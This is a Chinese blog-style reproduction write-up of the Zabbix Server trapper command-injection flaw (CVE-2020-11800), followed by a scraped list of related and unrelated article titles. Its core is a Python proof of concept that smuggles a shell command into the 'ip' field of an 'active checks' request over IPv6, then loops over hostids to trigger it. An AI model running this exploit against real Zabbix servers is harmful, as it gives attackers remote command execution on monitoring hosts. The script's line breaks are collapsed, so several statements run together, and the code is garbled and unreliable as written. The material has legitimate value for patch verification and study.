漏洞简介

Zabbix SIA Zabbix是拉脱维亚Zabbix SIA公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。 Zabbix SIA zabbix3-proxy 3.0.31之前版本和zabbix3-server 3.0.31之前版本中存在安全漏洞。在CVE-2017-2824中,其Server端 trapper command 功能存在一处代码执行漏洞,而修复补丁并不完善,导致可以利用IPv6进行绕过,注入任意命令。

漏洞复现

修改CVE-2017-2824的POC中的IP字段,构造新的POC:

import sys
import socket
import json
import sysdef send(ip, data):conn = socket.create_connection((ip, 10051), 10)conn.send(json.dumps(data).encode())data = conn.recv(2048)conn.close()return datatarget = sys.argv[1]
print(send(target, {"request":"active checks","host":"vulhub","ip":"ffff:::;touch /tmp/success2"}))
for i in range(10000, 10500):data = send(target, {"request":"command","scriptid":1,"hostid":str(i)})if data and b'failed' not in data:print('hostid: %d' % i)print(data)

当查看到如下结果时,则说明命令执行成功:

Zabbix Server trapper命令注入漏洞(CVE-2020-11800)相关推荐

  1. Zabbix Server trapper 命令注入漏洞 (CVE-2017-2824)

    文章目录 声明 一.漏洞简介 二.影响范围 三.环境搭建 四.本地实战 POC测试 反弹Shell 声明 本篇文章仅用于技术学习与漏洞复现,切勿用于非授权下的渗透测试行为,切记! 一.漏洞简介 Zab ...

  2. Zabbix Server trapper命令注入漏洞(CVE-2017-2824)

    漏洞简介 Zabbix Server是拉脱维亚Zabbix SIA公司的一套应用于服务器端的开源的监控系统.该系统可监视各种网络参数,并提供通知机制让系统管理员快速定位.解决存在的各种问题. Zabb ...

  3. (CVE-2020-11800)Zabbix_Server_trapper_命令注入漏洞

    (CVE-2020-11800)Zabbix_Server_trapper_命令注入漏洞 20210508 一.漏洞简介 Zabbix 是由Alexei Vladishev 开发的一种网络监视.管理系 ...

  4. java 漏洞挖掘_Apache Tika命令注入漏洞挖掘

    *本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担. 介绍 这篇文章将从一个Apache tika服务器的命令注入漏洞到完全利用的步骤. ...

  5. OpenSSH 命令注入漏洞通告(CVE-2020-15778,Openssh <=8.3p1)

    一.漏洞概要 2020年6月9日,研究人员Chinmay Pandya在Openssh中发现了一个漏洞,于7月18日公开.OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者 ...

  6. 查看openssh版本_OpenSSH命令注入漏洞复现(CVE202015778)

    OpenSSH命令注入漏洞复现(CVE-2020-15778) 目录 漏洞描述 漏洞等级 漏洞影响版本 漏洞复现 修复建议 ▶漏洞描述 OpenSSH是用于使用SSH协议进行远程登录的一个开源实现.通 ...

  7. openssh漏洞_技术干货 | OpenSSH命令注入漏洞复现(CVE202015778)

    本公众号发布的文章均转载自互联网或经作者投稿授权的原创,文末已注明出处,其内容和图片版权归原网站或作者本人所有,并不代表安全+的观点,若有无意侵权或转载不当之处请联系我们处理,谢谢合作! 欢迎各位添加 ...

  8. 对开源库 limdu 命令注入漏洞 (CVE-2020-4066) 的简要分析

     聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 开源库Limdu 的 trainBatch 函数中存在一个命令注入漏洞 (CVE-2020-4066). Limdu 是 Node.j ...

  9. 修改jar 注入_Apache Tika命令注入漏洞挖掘

    介绍 这篇文章将从一个Apache tika服务器的命令注入漏洞到完全利用的步骤.CVE是https://nvd.nist.gov/vuln/detail/CVE-2018-1335.由于Apache ...

最新文章

  1. Egret之位图字体
  2. 开始《数据机构与算法之美》之旅
  3. HOWTO:将 IOCTL 发送到筛选器驱动程序
  4. Toast 使用方法大全
  5. bzoj4558[JLoi2016]方 容斥+count
  6. db powerdesigner设计mysql数据库表
  7. 2018年计算机数据结构试题答案,2018年数据结构期末考试题及答案.pdf
  8. 站群的建立,是一个长期的工作,一年时间吧
  9. php excel复选框,excel如何实现下拉框复选
  10. 虚拟机安装黑苹果【虚拟机安装,黑苹果安装,黑苹果无法全屏问题】(这应该全网最全的资源了吧~)
  11. (软考高级、高项)信息系统项目管理师(第三版)过关经验
  12. 网络通信中 TCP 产生 RST 的三个条件分析
  13. python入门教材 52pj_PJzhang:python基础入门的7个疗程-five
  14. QT软件开发之入门基础-搭建开发环境
  15. XSS(跨站脚本攻击)相关内容总结整理
  16. 网络技术领域专业术语解释大全-170个术语
  17. js replace将文字表情替换为图片
  18. 【计算机网络】数据链路层(完整版)
  19. 【Bug修复】yuv生成mp4格式文件帧数(时间)与原视频不一致
  20. 根据物料序列号获取最新的HU号码_SAP刘梦_新浪博客

热门文章

  1. K-means clustering using random matrix sparsification(ICML2018)
  2. 公司网页服务器访问超时,网站页面请求后台超时的相关咨询
  3. meta-inf文件夹以及MANIFEST.MF文件的作用
  4. NTFS文件结构实习笔记
  5. python求x的y次方logn_[转载]关于开14次方的计算方法
  6. Wol 网络远程唤醒技术,通过TP-LINK路由器远程一键开启电脑
  7. Ubuntu20.04 conda安出错,成功解决:solving environment:failed with initial frozen solve.Retrying with flexibl
  8. 联想服务器重装系统u盘启动不了怎么办,联想thinkpad无法进入u盘启动怎么办?
  9. Python 汉字转化成拼音
  10. PHP-中文转换成拼音